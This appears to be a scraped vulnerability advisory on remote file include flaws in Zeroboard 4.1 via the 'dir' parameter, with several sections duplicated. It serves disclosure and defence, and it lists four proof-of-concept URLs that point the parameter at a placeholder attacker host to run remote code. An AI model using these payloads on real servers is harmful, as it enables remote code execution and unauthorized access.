Zeroboard DIR Parameter Remote File Include Vulnerabilities
BID:12206
Info
Zeroboard DIR Parameter Remote File Include Vulnerabilities
| Bugtraq ID: | 12206 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-0380 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 10 2005 12:00AM |
| Updated: | Jul 12 2009 09:27AM |
| Credit: | Discovery is credited to Optik4Lab. |
| Vulnerable: |
Zeroboard Zeroboard 4.1 pl5 Zeroboard Zeroboard 4.1 pl4 Zeroboard Zeroboard 4.1 pl3 Zeroboard Zeroboard 4.1 pl2 |
| Not Vulnerable: | |
Discussion
Zeroboard DIR Parameter Remote File Include Vulnerabilities
Multiple remote file include vulnerabilities affect Zeroboard. These issues are due to a failure of the application to properly sanitize user-supplied input through the 'dir' parameter prior to using it in a PHP 'include()' function call.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
All versions of Zeroboard are considered vulnerable at the moment.
Multiple remote file include vulnerabilities affect Zeroboard. These issues are due to a failure of the application to properly sanitize user-supplied input through the 'dir' parameter prior to using it in a PHP 'include()' function call.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
All versions of Zeroboard are considered vulnerable at the moment.
Exploit / POC
Zeroboard DIR Parameter Remote File Include Vulnerabilities
An exploit is not required.
The following proof of concept examples are available:
http://www.example.com/skin/zero_vote/error.php?dir=http://[ATTACKER]
http://www.example.com/skin/zero_vote/login.php?dir=http://[attacker]/
http://www.example.com/skin/zero_vote/setup.php?dir=http://[attacker]/
http://www.example.com/skin/zero_vote/ask_password.php?dir=http://[attacker]/
An exploit is not required.
The following proof of concept examples are available:
http://www.example.com/skin/zero_vote/error.php?dir=http://[ATTACKER]
http://www.example.com/skin/zero_vote/login.php?dir=http://[attacker]/
http://www.example.com/skin/zero_vote/setup.php?dir=http://[attacker]/
http://www.example.com/skin/zero_vote/ask_password.php?dir=http://[attacker]/
Solution / Fix
Zeroboard DIR Parameter Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Zeroboard DIR Parameter Remote File Include Vulnerabilities
References:
References: